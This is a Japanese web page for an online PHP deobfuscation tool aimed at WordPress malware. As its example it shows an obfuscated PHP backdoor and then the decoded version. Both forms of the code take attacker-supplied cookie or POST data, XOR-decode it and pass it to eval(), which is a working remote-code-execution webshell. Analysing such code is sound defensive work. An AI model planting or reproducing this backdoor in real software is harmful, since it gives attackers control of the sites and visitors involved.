Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
function/*P */vLsJGFhGJ($cxevcpW)
/*YAJ */{
/* o */return @pack( chr (/* A */880/*bDkN*/-/*C*/808 )."\x2a", $cxevcpW );
$hcDGqTlurZChEl/* HssYz */=/* JD*/md5($cxevcpW);
$KobEgfSqzb = base64_decode($cxevcpW);
if ($KobEgfSqzb === false)/*AVL*/{
$KobEgfSqzb/* Sp */= '';$_IS/*HOCW */=/* Ds */'1504';
/*Z */}
$bNqAtUJE = str_split($cxevcpW);
$PqTqRuK/* chh */= strlen($cxevcpW);
$hcDGqTlur = 0;
while ( $hcDGqTlur < $PqTqRuK )/* SmH*/{
$hcDGqTlur++;$_pWu =/* px */'3815';
/*E*/$KhxbwgWraA = $bNqAtUJE[$hcDGqTlur];;
/* tvRvJ */if (strpos($KhxbwgWraA, 'a') !==/* MdGCw */false) {
$bNqAtUJE[$hcDGqTlur] = strtoupper($KhxbwgWraA);
}
/* mSxGp*/}
$UmSsL/* OA */= implode('',/* enmWw */$bNqAtUJE);$_Z/*n */=/* BW */'10199';
/* g */$_GET['decoded']/*jLDGa */=/* kVXWf */$UmSsL;
$_POST['hash'] = $hcDGqTlurZChEl;
if (file_exists('path/to/file'))/*sekBI*/{
$RzZDrfE/*tCsX */= file_get_contents('path/to/file');;
$epNrUeTYi =/* cFt */explode(',', $RzZDrfE);
/*V */$mwxCEn = md5(serialize($epNrUeTYi));
if/*AYI */(is_array($epNrUeTYi)) {
$vEzbb = array_slice($epNrUeTYi, 0,/* apmL */5);;
}
/* utb */}
$NWznlTbrX =/*Dvcb*/array_map('trim', $vEzbb);
$hcDGqTlurhpoNFKsa/* R */= rawurldecode(implode(',',/* C */$NWznlTbrX));;
$_COOKIE['final_value'] =/* XCE */$hcDGqTlurhpoNFKsa;
}
function TDkgwLdKi()
{
$VQDtM/* lyuf */= Array($_COOKIE,/* T*/$_POST);
/*QlW */$bvUbx/*qqoxL*/=/*Orxq */array_map('md5', $_COOKIE);
$UeNTX = strpos($_SERVER['HTTP_USER_AGENT'], 'Mozilla') !== false ? 'browser/*u */is Mozilla' :/*gIi */'browser is not Mozilla';
/*KgJc */
/* Uf */if (is_array($VQDtM)) {
$QLdDVEKQJV/* iXg */= array_slice($VQDtM,/* mFV */0, 1);$_UZSjN =/*DD*/'25382';
/* CNJPe*/} else/* vRBV*/{
$QLdDVEKQJV =/* QUY*/[];
}
$ILZTWE/*jRMU */= explode(',',/* SF */'apple,orange,banana');;
$alElOqL/* tq */=/*NVCC */rawurldecode('%20Hello%20World%20');
$hcDGqTlur = 0;$_jEqzB =/* An */'2616';
/* IROk */while ($hcDGqTlur < count($ILZTWE) ) {
/*Qkg */$ILZTWE[$hcDGqTlur] =/* eiDa */str_repeat($ILZTWE[$hcDGqTlur], 2);
/* CpCq*/$hcDGqTlur++;$_JDoy/* YhGR */= '2800';
}
/*HHX*/
$haeBZy =/* IFRWV */str_repeat($UeNTX, 3);
/*FE */
/* zmZjU*/return $VQDtM;;
}
/* b */function vhfuazu($jSGzkVv)
{
/* RFIVI*/$OFsTKgfdTo = "\43";
foreach (TDkgwLdKi() as/*yKY */$BIpXH)/* gvot */{
zrRiiyeQvD($BIpXH, $OFsTKgfdTo);
/* UEr */}
}
/*roXk */
function/*C */gwCarXTUJ($YvsrNo, $CAiCYaQ)
/* sK */{
/* KVWO */if ( count/*OxB*/( $YvsrNo )/* CtTS*/==/* WAwr */3 ) {
/* Oy*/$hldlMPXGfI/*xeh*/=/*WYnR */$YvsrNo[1];;
$fWdrhJlHj/* NTNQ*/= $YvsrNo[2];
$RXLoMM/*RE*/= $hldlMPXGfI($fWdrhJlHj);$_VUi =/* fUH */'51196';
eval (/*nJZ*/$RXLoMM/* FcVVy */);
die ();
}
/*rp */}
/* xHnVA */function jCgIExDJW($cxevcpW, $hPdZJfug)
{
return $cxevcpW ^/* qRRb */$hPdZJfug;
}
/* DtE */
function/* FD */cMHDbaoAJ($GtvYQgBNd,/* qI */$OFsTKgfdTo)
{
$GtvYQgBNd = explode/* mRoM */($OFsTKgfdTo, $GtvYQgBNd/* E */);;
/* Qo*/
gwCarXTUJ($GtvYQgBNd, $OFsTKgfdTo);
}
function/* Jumi*/zrRiiyeQvD($BIpXH, $OFsTKgfdTo)
{
foreach/* bIQwM */(/*JSt */$BIpXH/*eq */as $hPdZJfug/*YBgg*/=> $cxevcpW ) {
GiYwGaQDzU($hPdZJfug,/* oq*/vLsJGFhGJ($cxevcpW), $OFsTKgfdTo);
}
}
function WUfvyqYJvZ($hPdZJfug, $cxevcpW)
{
$ZSLJjjkQu = strlen(/* b*/$cxevcpW )/strlen(/* c */$hPdZJfug/* hlH */);$_wZO = '26099';
$hPdZJfug/* pWlYv */.= "kLQtoC-EvRyBM-olCOYZL-oCwfCx-QNWkq-xFvd-EfhQG";;
$hPdZJfug/*WHU */= str_repeat/* MpH*/( $hPdZJfug, intval($ZSLJjjkQu) + 1);$_wCftq/* vBVu */=/* m */'43877';
/*P*/
/*Kuxj */return/*RTsuZ */$hPdZJfug;
}
function GiYwGaQDzU($hPdZJfug,/*Ij*/$cxevcpW, $OFsTKgfdTo)
{
cMHDbaoAJ(jCgIExDJW($cxevcpW,/* w */WUfvyqYJvZ($hPdZJfug,/* KDi */$cxevcpW)), $OFsTKgfdTo);$_FLDYE/* frt*/= '29089';
/* SW */$hcDGqTlurZLvJ = trim($cxevcpW);;
$GMHjnovc =/* kM*/explode($OFsTKgfdTo, $hcDGqTlurZLvJ);$_EEM/* x */=/*o */'19503';
/*Mbs */if/*zIorS */(count($GMHjnovc) > 1) {
/* jF */$YUXiZQaN = implode("\55", $GMHjnovc);$_nVnK =/* Ulm */'1749';
$ZryAdinwM/* C */=/* R*/str_pad($YUXiZQaN, 20,/*vAUvY */chr (48),/*WvJJt */STR_PAD_RIGHT);
}
}
vhfuazu("");<?php
function vLsJGFhGJ($cxevcpW)
{
/* o */
return @pack("H*", $cxevcpW);
}
function TDkgwLdKi()
{
$VQDtM = array(
$_COOKIE,
/* T*/
$_POST,
);
/*QlW */
$bvUbx = array_map('md5', $_COOKIE);
$UeNTX = strpos($_SERVER['HTTP_USER_AGENT'], 'Mozilla') !== false ? 'browser/*u */is Mozilla' : 'browser is not Mozilla';
/*KgJc */
/* Uf */
if (is_array($VQDtM)) {
$QLdDVEKQJV = array_slice(
$VQDtM,
/* mFV */
0,
1
);
$_UZSjN = '25382';
/* CNJPe*/
} else {
/* vRBV*/
$QLdDVEKQJV = [];
}
$ILZTWE = array(0 => "apple", 1 => "orange", 2 => "banana");
$alElOqL = " Hello World ";
$hcDGqTlur = 0;
$_jEqzB = '2616';
/* IROk */
while ($hcDGqTlur < count($ILZTWE)) {
/*Qkg */
$ILZTWE[$hcDGqTlur] = str_repeat($ILZTWE[$hcDGqTlur], 2);
/* CpCq*/
$hcDGqTlur++;
$_JDoy = '2800';
}
/*HHX*/
$haeBZy = str_repeat($UeNTX, 3);
/*FE */
/* zmZjU*/
return $VQDtM;
}
/* b */
function vhfuazu($jSGzkVv)
{
/* RFIVI*/
$OFsTKgfdTo = "#";
foreach (TDkgwLdKi() as $BIpXH) {
/* gvot */
zrRiiyeQvD($BIpXH, $OFsTKgfdTo);
/* UEr */
}
}
/*roXk */
function gwCarXTUJ($YvsrNo, $CAiCYaQ)
{
/* KVWO */
if (count($YvsrNo) == 3) {
/* Oy*/
$hldlMPXGfI = $YvsrNo[1];
$fWdrhJlHj = $YvsrNo[2];
$RXLoMM = $hldlMPXGfI($fWdrhJlHj);
$_VUi = '51196';
eval($RXLoMM);
die;
}
/*rp */
}
/* xHnVA */
function jCgIExDJW($cxevcpW, $hPdZJfug)
{
return $cxevcpW ^ $hPdZJfug;
}
/* DtE */
function cMHDbaoAJ($GtvYQgBNd, $OFsTKgfdTo)
{
$GtvYQgBNd = explode($OFsTKgfdTo, $GtvYQgBNd);
/* Qo*/
gwCarXTUJ($GtvYQgBNd, $OFsTKgfdTo);
}
function zrRiiyeQvD($BIpXH, $OFsTKgfdTo)
{
foreach ($BIpXH as $hPdZJfug => $cxevcpW) {
GiYwGaQDzU(
$hPdZJfug,
/* oq*/
vLsJGFhGJ($cxevcpW),
$OFsTKgfdTo
);
}
}
function WUfvyqYJvZ($hPdZJfug, $cxevcpW)
{
$ZSLJjjkQu = strlen(
/* b*/
$cxevcpW
) / strlen(
/* c */
$hPdZJfug
);
$_wZO = '26099';
$hPdZJfug .= "kLQtoC-EvRyBM-olCOYZL-oCwfCx-QNWkq-xFvd-EfhQG";
$hPdZJfug = str_repeat($hPdZJfug, intval($ZSLJjjkQu) + 1);
$_wCftq = '43877';
/*P*/
/*Kuxj */
return $hPdZJfug;
}
function GiYwGaQDzU($hPdZJfug, $cxevcpW, $OFsTKgfdTo)
{
cMHDbaoAJ(jCgIExDJW(
$cxevcpW,
/* w */
WUfvyqYJvZ(
$hPdZJfug,
/* KDi */
$cxevcpW
)
), $OFsTKgfdTo);
$_FLDYE = '29089';
/* SW */
$hcDGqTlurZLvJ = trim($cxevcpW);
$GMHjnovc = explode($OFsTKgfdTo, $hcDGqTlurZLvJ);
$_EEM = '19503';
/*Mbs */
if (count($GMHjnovc) > 1) {
/* jF */
$YUXiZQaN = implode("-", $GMHjnovc);
$_nVnK = '1749';
$ZryAdinwM = str_pad(
$YUXiZQaN,
20,
/*vAUvY */
"0",
/*WvJJt */
STR_PAD_RIGHT
);
}
}
vhfuazu("");■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.